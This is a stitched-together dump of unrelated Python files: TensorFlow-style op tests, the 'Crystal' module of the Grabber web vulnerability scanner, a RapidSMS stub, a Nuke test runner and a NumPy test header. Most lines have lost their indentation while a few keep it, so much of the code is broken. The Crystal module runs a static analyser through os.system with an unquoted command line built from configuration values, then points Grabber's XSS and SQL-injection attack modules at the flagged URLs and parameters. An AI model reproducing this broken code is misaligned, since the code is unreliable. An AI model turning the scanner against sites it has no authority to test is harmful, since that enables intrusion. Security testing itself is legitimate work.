np.array([10, 5, 2], dtype=np.float32),
expected=np.array([False, True, True], dtype=np.bool))
self._testBinary(
greater_equal_op,
np.float32(5),
np.array([1, 5, 20], dtype=np.float32),
expected=np.array([True, True, False], dtype=np.bool))
self._testBinary(
greater_equal_op,
np.array([[10], [7], [2]], dtype=np.float32),
np.float32(7),
expected=np.array([[True], [True], [False]], dtype=np.bool))
for less_op in [math_ops.less, (lambda x, y: x < y)]:
self._testBinary(
less_op,
np.array([1, 5, 20], dtype=np.float32),
np.array([10, 5, 2], dtype=np.float32),
expected=np.array([True, False, False], dtype=np.bool))
self._testBinary(
less_op,
np.float32(5),
np.array([1, 5, 20], dtype=np.float32),
expected=np.array([False, False, True], dtype=np.bool))
self._testBinary(
less_op,
np.array([[10], [7], [2]], dtype=np.float32),
np.float32(7),
expected=np.array([[False], [False], [True]], dtype=np.bool))
for less_equal_op in [math_ops.less_equal, (lambda x, y: x <= y)]:
self._testBinary(
less_equal_op,
np.array([1, 5, 20], dtype=np.float32),
np.array([10, 5, 2], dtype=np.float32),
expected=np.array([True, True, False], dtype=np.bool))
self._testBinary(
less_equal_op,
np.float32(5),
np.array([1, 5, 20], dtype=np.float32),
expected=np.array([False, True, True], dtype=np.bool))
self._testBinary(
less_equal_op,
np.array([[10], [7], [2]], dtype=np.float32),
np.float32(7),
expected=np.array([[False], [True], [True]], dtype=np.bool))
def testBroadcasting(self):
"""Tests broadcasting behavior of an operator."""
for dtype in self.numeric_types:
self._testBinary(
math_ops.add,
np.array(3, dtype=dtype),
np.array([10, 20], dtype=dtype),
expected=np.array([13, 23], dtype=dtype))
self._testBinary(
math_ops.add,
np.array([10, 20], dtype=dtype),
np.array(4, dtype=dtype),
expected=np.array([14, 24], dtype=dtype))
# [1,3] x [4,1] => [4,3]
self._testBinary(
math_ops.add,
np.array([[10, 20, 30]], dtype=dtype),
np.array([[1], [2], [3], [4]], dtype=dtype),
expected=np.array(
[[11, 21, 31], [12, 22, 32], [13, 23, 33], [14, 24, 34]],
dtype=dtype))
# [3] * [4,1] => [4,3]
self._testBinary(
math_ops.add,
np.array([10, 20, 30], dtype=dtype),
np.array([[1], [2], [3], [4]], dtype=dtype),
expected=np.array(
[[11, 21, 31], [12, 22, 32], [13, 23, 33], [14, 24, 34]],
dtype=dtype))
def testFill(self):
for dtype in self.numeric_types:
self._testBinary(
array_ops.fill,
np.array([], dtype=np.int32),
dtype(-42),
expected=dtype(-42))
self._testBinary(
array_ops.fill,
np.array([1, 2], dtype=np.int32),
dtype(7),
expected=np.array([[7, 7]], dtype=dtype))
self._testBinary(
array_ops.fill,
np.array([3, 2], dtype=np.int32),
dtype(50),
expected=np.array([[50, 50], [50, 50], [50, 50]], dtype=dtype))
# Helper method used by testMatMul, testSparseMatMul, testBatchMatMul below.
def _testMatMul(self, op):
for dtype in self.float_types:
self._testBinary(
op,
np.array([[-0.25]], dtype=dtype),
np.array([[8]], dtype=dtype),
expected=np.array([[-2]], dtype=dtype))
self._testBinary(
op,
np.array([[100, 10, 0.5]], dtype=dtype),
np.array([[1, 3], [2, 5], [6, 8]], dtype=dtype),
expected=np.array([[123, 354]], dtype=dtype))
self._testBinary(
op,
np.array([[1, 3], [2, 5], [6, 8]], dtype=dtype),
np.array([[100], [10]], dtype=dtype),
expected=np.array([[130], [250], [680]], dtype=dtype))
self._testBinary(
op,
np.array([[1000, 100], [10, 1]], dtype=dtype),
np.array([[1, 2], [3, 4]], dtype=dtype),
expected=np.array([[1300, 2400], [13, 24]], dtype=dtype))
self._testBinary(
op,
np.array([], dtype=dtype).reshape((2, 0)),
np.array([], dtype=dtype).reshape((0, 3)),
expected=np.array([[0, 0, 0], [0, 0, 0]], dtype=dtype))
def testMatMul(self):
self._testMatMul(math_ops.matmul)
# TODO(phawkins): failing on GPU, no registered kernel.
def DISABLED_testSparseMatMul(self):
# Binary wrappers for sparse_matmul with different hints
    def SparseMatmulWrapperTF(a, b):
      return math_ops.sparse_matmul(a, b, a_is_sparse=True)
    def SparseMatmulWrapperFT(a, b):
      return math_ops.sparse_matmul(a, b, b_is_sparse=True)
    def SparseMatmulWrapperTT(a, b):
      return math_ops.sparse_matmul(a, b, a_is_sparse=True, b_is_sparse=True)
    self._testMatMul(math_ops.sparse_matmul)
self._testMatMul(SparseMatmulWrapperTF)
self._testMatMul(SparseMatmulWrapperFT)
self._testMatMul(SparseMatmulWrapperTT)
def testBatchMatMul(self):
# Same tests as for tf.matmul above.
self._testMatMul(math_ops.matmul)
# Tests with batches of matrices.
self._testBinary(
math_ops.matmul,
np.array([[[-0.25]]], dtype=np.float32),
np.array([[[8]]], dtype=np.float32),
expected=np.array([[[-2]]], dtype=np.float32))
self._testBinary(
math_ops.matmul,
np.array([[[-0.25]], [[4]]], dtype=np.float32),
np.array([[[8]], [[2]]], dtype=np.float32),
expected=np.array([[[-2]], [[8]]], dtype=np.float32))
self._testBinary(
math_ops.matmul,
np.array(
[[[[7, 13], [10, 1]], [[2, 0.25], [20, 2]]],
[[[3, 5], [30, 3]], [[0.75, 1], [40, 4]]]],
dtype=np.float32),
np.array(
[[[[1, 2], [3, 4]], [[5, 6], [7, 8]]], [[[11, 22], [33, 44]],
[[55, 66], [77, 88]]]],
dtype=np.float32),
expected=np.array(
[[[[46, 66], [13, 24]], [[11.75, 14], [114, 136]]],
[[[198, 286], [429, 792]], [[118.25, 137.5], [2508, 2992]]]],
dtype=np.float32))
self._testBinary(
math_ops.matmul,
np.array([], dtype=np.float32).reshape((2, 2, 0)),
np.array([], dtype=np.float32).reshape((2, 0, 3)),
expected=np.array(
[[[0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0]]],
dtype=np.float32))
self._testBinary(
math_ops.matmul,
np.array([], dtype=np.float32).reshape((0, 2, 4)),
np.array([], dtype=np.float32).reshape((0, 4, 3)),
expected=np.array([], dtype=np.float32).reshape(0, 2, 3))
# Regression test for b/31472796.
if hasattr(np, "matmul"):
x = np.arange(0, 3 * 5 * 2 * 7, dtype=np.float32).reshape((3, 5, 2, 7))
self._testBinary(
lambda x, y: math_ops.matmul(x, y, adjoint_b=True),
x, x,
expected=np.matmul(x, x.transpose([0, 1, 3, 2])))
def testExpandDims(self):
for dtype in self.numeric_types:
self._testBinary(
array_ops.expand_dims,
dtype(7),
np.int32(0),
expected=np.array([7], dtype=dtype))
self._testBinary(
array_ops.expand_dims,
np.array([42], dtype=dtype),
np.int32(0),
expected=np.array([[42]], dtype=dtype))
self._testBinary(
array_ops.expand_dims,
np.array([], dtype=dtype),
np.int32(0),
expected=np.array([[]], dtype=dtype))
self._testBinary(
array_ops.expand_dims,
np.array([[[1, 2], [3, 4]]], dtype=dtype),
np.int32(0),
expected=np.array([[[[1, 2], [3, 4]]]], dtype=dtype))
self._testBinary(
array_ops.expand_dims,
np.array([[[1, 2], [3, 4]]], dtype=dtype),
np.int32(1),
expected=np.array([[[[1, 2], [3, 4]]]], dtype=dtype))
self._testBinary(
array_ops.expand_dims,
np.array([[[1, 2], [3, 4]]], dtype=dtype),
np.int32(2),
expected=np.array([[[[1, 2]], [[3, 4]]]], dtype=dtype))
self._testBinary(
array_ops.expand_dims,
np.array([[[1, 2], [3, 4]]], dtype=dtype),
np.int32(3),
expected=np.array([[[[1], [2]], [[3], [4]]]], dtype=dtype))
def testPad(self):
for dtype in self.numeric_types:
self._testBinary(
array_ops.pad,
np.array(
[[1, 2, 3], [4, 5, 6]], dtype=dtype),
np.array(
[[1, 2], [2, 1]], dtype=np.int32),
expected=np.array(
[[0, 0, 0, 0, 0, 0],
[0, 0, 1, 2, 3, 0],
[0, 0, 4, 5, 6, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]],
dtype=dtype))
def testMirrorPad(self):
mirror_pad = lambda t, paddings: array_ops.pad(t, paddings, "REFLECT")
for dtype in self.numeric_types:
self._testBinary(
mirror_pad,
np.array(
[
[1, 2, 3], #
[4, 5, 6], #
],
dtype=dtype),
np.array([[
1,
1,
], [2, 2]], dtype=np.int32),
expected=np.array(
[
[6, 5, 4, 5, 6, 5, 4], #
[3, 2, 1, 2, 3, 2, 1], #
[6, 5, 4, 5, 6, 5, 4], #
[3, 2, 1, 2, 3, 2, 1]
],
dtype=dtype))
self._testBinary(
mirror_pad,
np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype),
np.array([[0, 0], [0, 0]], dtype=np.int32),
expected=np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype))
self._testBinary(
mirror_pad,
np.array(
[
[1, 2, 3], #
[4, 5, 6], #
[7, 8, 9]
],
dtype=dtype),
np.array([[2, 2], [0, 0]], dtype=np.int32),
expected=np.array(
[
[7, 8, 9], #
[4, 5, 6], #
[1, 2, 3], #
[4, 5, 6], #
[7, 8, 9], #
[4, 5, 6], #
[1, 2, 3]
],
dtype=dtype))
self._testBinary(
mirror_pad,
np.array(
[
[[1, 2, 3], [4, 5, 6]],
[[7, 8, 9], [10, 11, 12]],
], dtype=dtype),
np.array([[0, 0], [1, 1], [1, 1]], dtype=np.int32),
expected=np.array(
[
[
[5, 4, 5, 6, 5], #
[2, 1, 2, 3, 2], #
[5, 4, 5, 6, 5], #
[2, 1, 2, 3, 2], #
],
[
[11, 10, 11, 12, 11], #
[8, 7, 8, 9, 8], #
[11, 10, 11, 12, 11], #
[8, 7, 8, 9, 8], #
]
],
dtype=dtype))
def testReshape(self):
for dtype in self.numeric_types:
self._testBinary(
array_ops.reshape,
np.array([], dtype=dtype),
np.array([0, 4], dtype=np.int32),
expected=np.zeros(shape=[0, 4], dtype=dtype))
self._testBinary(
array_ops.reshape,
np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
np.array([2, 3], dtype=np.int32),
expected=np.array([[0, 1, 2], [3, 4, 5]], dtype=dtype))
self._testBinary(
array_ops.reshape,
np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
np.array([3, 2], dtype=np.int32),
expected=np.array([[0, 1], [2, 3], [4, 5]], dtype=dtype))
self._testBinary(
array_ops.reshape,
np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
np.array([-1, 6], dtype=np.int32),
expected=np.array([[0, 1, 2, 3, 4, 5]], dtype=dtype))
self._testBinary(
array_ops.reshape,
np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
np.array([6, -1], dtype=np.int32),
expected=np.array([[0], [1], [2], [3], [4], [5]], dtype=dtype))
self._testBinary(
array_ops.reshape,
np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
np.array([2, -1], dtype=np.int32),
expected=np.array([[0, 1, 2], [3, 4, 5]], dtype=dtype))
self._testBinary(
array_ops.reshape,
np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
np.array([-1, 3], dtype=np.int32),
expected=np.array([[0, 1, 2], [3, 4, 5]], dtype=dtype))
def testSplit(self):
for dtype in self.numeric_types:
self._testBinary(
lambda x, y: array_ops.split(value=y, num_or_size_splits=3, axis=x),
np.int32(0),
np.array([[[1], [2]], [[3], [4]], [[5], [6]]],
dtype=dtype),
expected=[
np.array([[[1], [2]]], dtype=dtype),
np.array([[[3], [4]]], dtype=dtype),
np.array([[[5], [6]]], dtype=dtype),
],
equality_test=self.ListsAreClose)
self._testBinary(
lambda x, y: array_ops.split(value=y, num_or_size_splits=2, axis=x),
np.int32(1),
np.array([[[1], [2]], [[3], [4]], [[5], [6]]],
dtype=dtype),
expected=[
np.array([[[1]], [[3]], [[5]]], dtype=dtype),
np.array([[[2]], [[4]], [[6]]], dtype=dtype),
],
equality_test=self.ListsAreClose)
def testTile(self):
for dtype in self.numeric_types:
self._testBinary(
array_ops.tile,
np.array([[6]], dtype=dtype),
np.array([1, 2], dtype=np.int32),
expected=np.array([[6, 6]], dtype=dtype))
self._testBinary(
array_ops.tile,
np.array([[1], [2]], dtype=dtype),
np.array([1, 2], dtype=np.int32),
expected=np.array([[1, 1], [2, 2]], dtype=dtype))
self._testBinary(
array_ops.tile,
np.array([[1, 2], [3, 4]], dtype=dtype),
np.array([3, 2], dtype=np.int32),
expected=np.array(
[[1, 2, 1, 2],
[3, 4, 3, 4],
[1, 2, 1, 2],
[3, 4, 3, 4],
[1, 2, 1, 2],
[3, 4, 3, 4]],
dtype=dtype))
self._testBinary(
array_ops.tile,
np.array([[1, 2], [3, 4]], dtype=dtype),
np.array([1, 1], dtype=np.int32),
expected=np.array(
[[1, 2],
[3, 4]],
dtype=dtype))
self._testBinary(
array_ops.tile,
np.array([[1, 2]], dtype=dtype),
np.array([3, 1], dtype=np.int32),
expected=np.array(
[[1, 2],
[1, 2],
[1, 2]],
dtype=dtype))
def testTranspose(self):
for dtype in self.numeric_types:
self._testBinary(
array_ops.transpose,
np.zeros(shape=[1, 0, 4], dtype=dtype),
np.array([1, 2, 0], dtype=np.int32),
expected=np.zeros(shape=[0, 4, 1], dtype=dtype))
self._testBinary(
array_ops.transpose,
np.array([[1, 2], [3, 4]], dtype=dtype),
np.array([0, 1], dtype=np.int32),
expected=np.array([[1, 2], [3, 4]], dtype=dtype))
self._testBinary(
array_ops.transpose,
np.array([[1, 2], [3, 4]], dtype=dtype),
np.array([1, 0], dtype=np.int32),
expected=np.array([[1, 3], [2, 4]], dtype=dtype))
def testCross(self):
for dtype in self.float_types:
self._testBinary(
gen_math_ops.cross,
np.zeros((4, 3), dtype=dtype),
np.zeros((4, 3), dtype=dtype),
expected=np.zeros((4, 3), dtype=dtype))
self._testBinary(
gen_math_ops.cross,
np.array([1, 2, 3], dtype=dtype),
np.array([4, 5, 6], dtype=dtype),
expected=np.array([-3, 6, -3], dtype=dtype))
self._testBinary(
gen_math_ops.cross,
np.array([[1, 2, 3], [10, 11, 12]], dtype=dtype),
np.array([[4, 5, 6], [40, 50, 60]], dtype=dtype),
expected=np.array([[-3, 6, -3], [60, -120, 60]], dtype=dtype))
if __name__ == "__main__":
googletest.main()
|
"""
Crystal Module for Grabber v0.1
Copyright (C) 2006 - Romain Gaucher - http://rgaucher.info
"""
import sys,os,re, string, shutil
from xml.sax import * # Need PyXML [http://pyxml.sourceforge.net/]
from grabber import getContent_POST, getContentDirectURL_POST
from grabber import getContent_GET , getContentDirectURL_GET
from grabber import single_urlencode, partially_in, unescape
from grabber import investigate, setDatabase
from spider import flatten, htmlencode, dict_add
from spider import database
vulnToDescritiveNames = {
'xss' : 'Cross-Site Scripting',
'sql' : 'SQL Injection',
'bsql': 'Specific Blind Injection...',
'include' : 'PHP Include Vulnerability'
}
"""
Crystal Module Cooking Book
---------------------------
Make-ahead Tip: Prepare lots of coffee before starting...
Preparation: 24 hours
Ingredients:
A: PHP-Sat
B: Grabber Modules lambda
Tools:
A: Context editor
B: Python 2.4
    C: Nice music (Opera is not needed but you should listen to this)
Directions:
    0) Read the configuration file (with boolean operators in patterns)
    1) Scan the PHP sources with the PHP-Sat handler (which copies everything
       into the '/local/crystal/' directory).
    2) Make a kind of diff, then:
       If the diff has results, check for the patterns (given in the configuration file)
Parse the PHP line under the end of the pattern
Try to get a variable value
<after>
If no direct variable... backtrack sequentially or in the AST
</after>
3) Generate the XML report of "the crystal-static-analysis" module
4) Build a database of:
>>> transformed_into_URL(hypothetical flawed files) : {list of "flawed" params}
5) Run the classical tools
"""
crystalFiles = None
crystalUrl = None
crystalExtension = None
crystalAnalyzerBin= None
crystalAnalyzerInputParam = None
crystalAnalyzerOutputParam = None
crystalCheckStart = None
crystalCheckEnd = None
crystalPatterns = {}
crystalRegExpPatterns = {}
crystalStorage = []
crystalDatabase = {}
crystalFinalStorage = {}
def normalize_whitespace(text):
return ' '.join(text.split())
def clear_whitespace(text):
return text.replace(' ','')
class CrystalConfHandler(ContentHandler):
def __init__(self):
self.inAnalyzer = False
self.inPatterns = False
self.inPattern = False
self.isRegExp = False
        self.currentVarPos = None
self.currentKeys = []
self.string = ""
def startElement(self, name, attrs):
global crystalAnalyzerInputParam, crystalAnalyzerOutputParam, crystalPatterns, crystalCheckStart, crystalCheckEnd
self.string = ""
self.currentKeys = []
if name == 'analyzer':
self.inAnalyzer = True
elif name == 'path' and self.inAnalyzer:
# store the attributes input and output
if 'input' in attrs.keys() and 'output' in attrs.keys():
crystalAnalyzerInputParam = attrs.getValue('input')
crystalAnalyzerOutputParam = attrs.getValue('output')
else:
raise KeyError("CrystalXMLConf: <path> needs 'input' and 'output' attributes")
elif name == 'patterns' and self.inAnalyzer:
self.inPatterns = True
if 'start' in attrs.keys() and 'end' in attrs.keys():
crystalCheckStart = attrs.getValue('start')
crystalCheckEnd = attrs.getValue('end')
else:
raise KeyError("CrystalXMLConf: <patterns> needs 'start' and 'end' attributes")
if 'name' in attrs.keys():
if attrs.getValue('name').lower() == 'regexp':
self.isRegExp = True
elif self.inPatterns and name == 'pattern':
self.inPattern = True
            if 'module' in attrs.keys():
                modules = attrs.getValue('module')
                modules = modules.replace(' ', '')
                self.currentKeys = modules.split(',')
            if self.isRegExp:
                if 'varposition' in attrs.keys():
                    self.currentVarPos = attrs.getValue('varposition')
                else:
                    raise KeyError("CrystalXMLConf: <pattern> needs 'varposition' attribute")
def characters(self, ch):
self.string = self.string + ch
def endElement(self, name):
global crystalFiles, crystalUrl, crystalExtension, crystalAnalyzerBin, crystalPatterns, crystalRegExpPatterns
if name == 'files':
crystalFiles = normalize_whitespace(self.string)
elif name == 'url':
crystalUrl = normalize_whitespace(self.string)
elif name == 'extension' and self.inAnalyzer:
crystalExtension = normalize_whitespace(self.string)
elif name == 'path' and self.inAnalyzer:
crystalAnalyzerBin = normalize_whitespace(self.string)
elif not self.isRegExp and name == 'pattern' and self.inPattern:
tempList = self.string.split('__OR__')
for a in self.currentKeys:
if a not in crystalPatterns:
crystalPatterns[a] = []
l = crystalPatterns[a]
for t in tempList:
l.append(normalize_whitespace(t))
        elif self.isRegExp and name == 'pattern' and self.inPattern:
            # Disabled: intended handling of regular-expression patterns.
            """
            tempList = self.string.split('__OR__')
            for a in self.currentKeys:
                if a not in crystalRegExpPatterns:
                    crystalRegExpPatterns[a] = []
                l = crystalRegExpPatterns[a]
                for t in tempList:
                    # build the compiled regexp
                    plop = re.compile(normalize_whitespace(t), re.I)
                    l.append({self.currentVarPos: plop})
            """
elif name == "patterns" and self.inPatterns:
self.inPatterns = False
if self.isRegExp:
self.isRegExp = False
elif name == "analyzer" and self.inAnalyzer:
self.inAnalyzer = False
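# Illustrative configuration shape implied by CrystalConfHandler above; the
# element and attribute names come from the handler logic, but every value
# shown (paths, flags, markers, patterns) is hypothetical:
#
#   <config>
#     <files>/var/www/site</files>
#     <url>http://localhost/site</url>
#     <analyzer>
#       <extension>php</extension>
#       <path input="-i" output="-o">/usr/local/bin/php-sat</path>
#       <patterns start="BEGIN-FLAW" end="END-FLAW" name="plain">
#         <pattern module="xss,sql">echo $_GET__OR__print $_GET</pattern>
#       </patterns>
#     </analyzer>
#   </config>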
def copySubTree(src, dst, regFilter):
global crystalStorage
names = os.listdir(src)
    try:
        os.mkdir(dst)
    except OSError:
        pass
    try:
        os.mkdir(dst.replace('crystal/current', 'crystal/analyzed'))
    except OSError:
        pass
for name in names:
srcname = os.path.join(src, name)
dstname = os.path.join(dst, name)
try:
if os.path.islink(srcname):
linkto = os.readlink(srcname)
os.symlink(linkto, dstname)
elif os.path.isdir(srcname):
copySubTree(srcname, dstname, regFilter)
elif regFilter.match(srcname):
shutil.copy2(srcname, dstname)
crystalStorage.append(dstname)
        except (IOError, os.error):
            continue
def execCmd(program, args):
p = os.popen(program + " " + args)
p.close()
def generateListOfFiles():
"""
Create a ghost in ./local/crystal/current and /local/crystal/analyzed
And run the SwA tool
"""
    regScripts = re.compile(r'(.*)\.' + crystalExtension + '$', re.I)
copySubTree(crystalFiles, 'local/crystal/current', regScripts)
print "Running the static analysis tool..."
for file in crystalStorage:
fileIn = os.path.abspath(os.path.join('./', file))
fileOut = os.path.abspath(os.path.join('./', file.replace('current', 'analyzed')))
cmdLine = crystalAnalyzerInputParam + " " + fileIn + " " + crystalAnalyzerOutputParam + " " + fileOut
# execCmd(crystalAnalyzerBin, cmdLine)
print crystalAnalyzerBin,cmdLine
os.system(crystalAnalyzerBin +" "+ cmdLine)
def stripNoneASCII(output):
    # there should be a cleaner way to do that.. :/
newOutput = ""
for s in output:
try:
s = s.encode()
newOutput += s
except UnicodeDecodeError:
continue
return newOutput
def isPatternInFile(fileName):
global crystalDatabase
file = None
try:
file = open(fileName, 'r')
except IOError:
print "Crystal: Cannot open the file [%s]" % fileName
return False
inZone, inLined = False, False
detectPattern = False
lineNumber = 0
shortName = fileName[fileName.rfind('analyzed') + 9 : ]
vulnName = ""
for l in file.readlines():
lineNumber += 1
l = l.replace('\n','')
try:
"""
Check for the regular expression patterns
if len(crystalRegExpPatterns) > 0:
for modules in crystalRegExpPatterns:
for regexp in crystalRegExpPatterns[modules]:
if regexp.match()
"""
            if len(vulnName) > 0 and ((detectPattern and not inZone) or inLined):
                # build the result structure, e.g.:
                # { 'index.php' : {'xss' : {'12' : 'echo $_GET["plop"]'}}}
if shortName not in crystalDatabase:
crystalDatabase[shortName] = {}
if vulnName not in crystalDatabase[shortName]:
crystalDatabase[shortName][vulnName] = {}
if str(lineNumber) not in crystalDatabase[shortName][vulnName]:
crystalDatabase[shortName][vulnName][str(lineNumber)] = l
detectPattern = False
inLined = False
vulnName = ""
            if l.count(crystalCheckStart) > 0 and not inZone:
                b1 = l.find(crystalCheckStart)
                inZone = True
                # same line for start and end ?
                if l.count(crystalCheckEnd) > 0:
                    b2 = l.find(crystalCheckEnd)
                    if b1 < b2:
                        inZone = False
                    # look for every known pattern between the two markers
                    for modules in crystalPatterns:
                        for pattern in crystalPatterns[modules]:
                            position = l.lower().find(pattern.lower())
                            if b1 < position < b2:
                                detectPattern = True
                                inLined = True
                                vulnName = modules
elif inZone:
# is there any pattern around the corner ?
for modules in crystalPatterns:
for p in crystalPatterns[modules]:
p = p.lower()
l = l.lower()
                    # The following code is stupid!
                    # I have to change the algorithm for the __AND__ parsing...
                    if '__AND__' in p:
                        listPatterns = p.split('__AND__')
                        isIn = True
                        for patton in listPatterns:
                            if patton not in l:
                                isIn = False
                        if isIn:
                            detectPattern = True
                            vulnName = modules
else:
# test if the simple pattern is in the line
if p in l:
detectPattern = True
vulnName = modules
if l.count(crystalCheckEnd) > 0:
inZone = False
except UnicodeDecodeError:
continue
    file.close()
    return True
def buildDatabase():
"""
    Read the analyzed files (indirectly, via crystalStorage entries with 'current' replaced by 'analyzed')
And look for the patterns
"""
for file in crystalStorage:
fileOut = os.path.abspath(os.path.join('./', file.replace('current', 'analyzed')))
if not isPatternInFile(fileOut):
print "Error with the file [%s]" % file
def createStructure():
"""
Create the structure in the ./local directory
"""
    try:
        os.mkdir("local/crystal/")
    except OSError:
        pass
    try:
        os.mkdir("local/crystal/current")
    except OSError:
        pass
    try:
        os.mkdir("local/crystal/analyzed")
    except OSError:
        pass
"""
def realLineNumberReverse(fileName, codeStr):
print fileName, codeStr
try:
fN = os.path.abspath(os.path.join('./local/crystal/current/', fileName))
file = open(fN, 'r')
lineNumber = 0
for a in file.readlines():
lineNumber += 1
if codeStr in a:
print a
file.close()
return lineNumber
file.close()
except IOError,e:
print e
return 0
return 0
"""
def generateReport_1():
"""
Create a first report like:
* Developer report:
# using XSLT...
<site>
<file name="index.php">
<vulnerability line="9">xss</vulnerability>
<vulnerability line="25">sql</vulnerability>
</file>
...
</site>
* Security report:
<site>
<vulnerability name="xss">
<file name="index.php" line="9" />
...
        </vulnerability>
<vulnerability name="sql">
<file name="index.php" line="25" />
        </vulnerability>
</site>
"""
plop = open('results/crystal_SecurityReport_Grabber.xml','w')
plop.write("<crystal>\n")
plop.write("<site>\n")
plop.write("<!-- The line numbers are from the files in the 'analyzed' directory -->\n")
for file in crystalDatabase:
plop.write("\t<file name='%s'>\n" % file)
for vuln in crystalDatabase[file]:
for line in crystalDatabase[file][vuln]:
# lineNumber = realLineNumberReverse(file,crystalDatabase[file][vuln][line])
localVuln = vuln
if localVuln in vulnToDescritiveNames:
localVuln = vulnToDescritiveNames[localVuln]
plop.write("\t\t<vulnerability name='%s' line='%s' >%s</vulnerability>\n" % (localVuln, line, htmlencode(crystalDatabase[file][vuln][line])))
plop.write("\t</file>\n")
plop.write("</site>\n")
plop.write("</crystal>\n")
plop.close()
def buildUrlKey(file):
fileName = file.replace('\\','/') # on windows...
keyUrl = crystalUrl
    if keyUrl[-1] != '/' and fileName[0] != '/':
keyUrl += '/'
keyUrl += fileName
return keyUrl
# non-greedy groups so that every parameter on a line is found in turn,
# not just the last one
reParamPOST = re.compile(r'(.*?)\$_POST\[(.+?)\](.*)', re.I)
reParamGET = re.compile(r'(.*?)\$_GET\[(.+?)\](.*)', re.I)
def getSimpleParamFromCode_GET(code):
"""
Using the regular expression above, try to get some parameters name
"""
params = [] # we can have multiple params...
    code = code.replace("'", '')
    code = code.replace('"', '')
if code.lower().count('get') > 0:
# try to match the $_GET
if reParamGET.match(code):
out = reParamGET.search(code)
params.append(out.group(2))
params.append(getSimpleParamFromCode_GET(out.group(3)))
params = flatten(params)
return params
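# Illustration (the PHP line is hypothetical): with the non-greedy groups
# above, every parameter in a line is recovered in order, e.g.
#   getSimpleParamFromCode_GET('echo $_GET["id"] . $_GET["page"];')
# should return ['id', 'page'] once flatten() has squashed the recursion.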
def getSimpleParamFromCode_POST(code):
"""
Using the regular expression above, try to get some parameters name
"""
params = [] # we can have multiple params...
    code = code.replace("'", '')
    code = code.replace('"', '')
if code.lower().count('post') > 0:
        # try to match the $_POST
if reParamPOST.match(code):
out = reParamPOST.search(code)
params.append(out.group(2))
params.append(getSimpleParamFromCode_POST(out.group(3)))
params = flatten(params)
return params
def createClassicalDatabase(vulnsType, localCrystalDB):
"""
From the crystalDatabase, generate the same database as in Spider
    This is generated so the different attack modules can be called
ClassicalDB = { url : { 'GET' : { param : value } } }
"""
classicalDB = {}
for file in localCrystalDB:
# build the URL
keyUrl = buildUrlKey(file)
if keyUrl not in classicalDB:
classicalDB[keyUrl] = {'GET' : {}, 'POST' : {}}
for vuln in localCrystalDB[file]:
# only get the kind of vulnerability we want
if vuln != vulnsType:
continue
for line in localCrystalDB[file][vuln]:
code = localCrystalDB[file][vuln][line]
# try to extract some data...
params_GET = getSimpleParamFromCode_GET (code)
params_POST = getSimpleParamFromCode_POST(code)
if len(params_GET) > 0:
for p in params_GET:
lG = classicalDB[keyUrl]['GET']
if p not in classicalDB[keyUrl]['GET']:
lG = dict_add(lG,{p:''})
classicalDB[keyUrl]['GET'] = lG
if len(params_POST) > 0:
for p in params_POST:
lP = classicalDB[keyUrl]['POST']
if p not in classicalDB[keyUrl]['POST']:
lP = dict_add(lP,{p:''})
classicalDB[keyUrl]['POST'] = lP
return classicalDB
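# Shape sketch (the values are made up): for vulnsType == 'xss', a crystal
# entry such as
#   { 'index.php' : {'xss' : {'12' : 'echo $_GET["id"];'}} }
# collapses into the Spider-style
#   { crystalUrl + '/index.php' : {'GET' : {'id' : ''}, 'POST' : {}} }
# -- line numbers and code snippets are dropped, only parameter names survive.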
def retrieveVulnList():
vulnList = []
for file in crystalDatabase:
for vuln in crystalDatabase[file]:
if vuln not in vulnList:
vulnList.append(vuln)
return vulnList
def process(urlGlobal, localDB, attack_list):
"""
Crystal Module entry point
"""
print "Crystal Module Start"
try:
f = open("crystal.conf.xml", 'r')
f.close()
except IOError:
print "The crystal module needs the 'crystal.conf.xml' configuration file."
sys.exit(1)
parser = make_parser()
crystal_handler = CrystalConfHandler()
# Tell the parser to use our handler
parser.setContentHandler(crystal_handler)
try:
parser.parse("crystal.conf.xml")
except KeyError, e:
print e
sys.exit(1)
#---------- White box testing
createStructure()
generateListOfFiles()
buildDatabase()
print "Build first report: List of vulneratilities and places in the code"
generateReport_1()
#---------- Start the Black Box testing
    # we need to create a classical-style database, which loses information,
    # but scoped to one type of vulnerability at a time
listVulns = retrieveVulnList()
for vulns in listVulns:
localDatabase = createClassicalDatabase(vulns, crystalDatabase)
setDatabase(localDatabase)
print "inProcess Crystal DB = ", localDatabase
# print vulns, database
# Call the Black Box Module
print "Scan for ", vulns
investigate(crystalUrl, vulns)
print "Crystal Module Stop"
|
import rapidsms
class App(rapidsms.app.App):
'''Do nothing. This app is for django integration only and
has no sms functionality. This file and class exist only
    so the router does not print an error message.'''
#TODO find a more sensible way of allowing non-sms apps
pass
|
import unittest
import IECore
import sys
sys.path.append( "test/IECoreNuke" )
from KnobAccessorsTest import *
from FnAxisTest import *
from StringUtilTest import *
from KnobConvertersTest import *
from ParameterisedHolderTest import ParameterisedHolderTest
from ObjectKnobTest import ObjectKnobTest
from OpHolderTest import OpHolderTest
if IECore.withPNG() :
from PNGReaderTest import PNGReaderTest
unittest.TestProgram(
testRunner = unittest.TextTestRunner(
stream = IECore.CompoundStream(
[
sys.stderr,
open( "test/IECoreNuke/resultsPython.txt", "w" )
]
),
verbosity = 2
)
)
|
""" Test functions for linalg module
"""
from __future__ import division, absolute_import, print_function
import os
import sys
import itertools
import traceback
import numpy as np
from numpy import array, single, double, csingle, cdouble, dot, identity
from numpy import multiply, atleast_2d, inf, asarray, matrix
from numpy import linalg
from numpy.linalg import matrix_power, norm, matrix_rank, multi_dot
from numpy.linalg.linalg import _multi_dot_matrix_chain_order
from numpy.testing import (
assert_, assert_equal, assert_raises, assert_array_equal,
assert_almost_equal, assert_allclose, run_module_suite,
dec
)
def ifthen(a, b):
return not a or b
def imply(a, b):
return not a or b
old_assert_almost_equal = assert_almost_equal
def assert_almost_equal(a, b, **kw):
if asarray(a).dtype.type in (single, csingle):
decimal = 6
else:
decimal = 12
old_assert_almost_equal(a, b, decimal=decimal, **kw)
def get_real_dtype(dtype):
return {single: single, double: double,
csingle: single, cdouble: double}[dtype]
